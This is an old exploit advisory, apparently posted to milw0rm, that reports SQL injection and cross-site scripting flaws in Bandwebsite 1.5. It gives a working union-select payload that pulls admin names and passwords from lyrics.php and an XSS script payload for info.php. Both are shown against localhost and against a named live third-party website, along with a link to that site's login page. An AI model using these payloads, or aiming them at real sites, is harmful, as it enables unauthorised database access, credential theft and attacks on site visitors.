Bandwebsite 1.5 (SQL/XSS) Multiple Remote Vulnerabilities[~] Bandwebsite Version 1.5 Sql &amp; XSS Multiple Remote Vuln.
[~]
[~] download: http://membres.lycos.fr/fluxx/bandwebsite.php
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu   msn: trt-turk@hotmail.com
[~]
[~] Date: 24.11.2008
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] Kucuk Bir Rica: Lutfen DemolarI Hacklemeyin ( pls dont make hack demos )
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~]
[~] N0T: OGRETMENLER GUNUMUZ KUTLU OLSUN : ) )
[~]
[~] N0T: RedHaK Kardesime ozel tesekurler.
[~] -----------------------------------------------------------

exploit:

http://localhost/script/lyrics.php?section=full&amp;id=[SQL]

http://localhost/script/info.php?section=[XSS]

[SQL]

99999999+union+select+1,name,3,pass,5+from+admin--


example:

http://www.caro-kunde.de/lyrics.php?section=full&amp;id=99999999+union+select+1,name,3,pass,5+from+admin--

login:

http://www.caro-kunde.de/login.php


XSS:

http://www.caro-kunde.de/info.php?section=`><script>alert()</script>


[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke &amp; RedHaK
[~]
[~] yildirimordulari.org  &amp;  darkc0de.com
[~]
[~]----------------------------------------------------------------------

# milw0rm.com [2008-11-24]
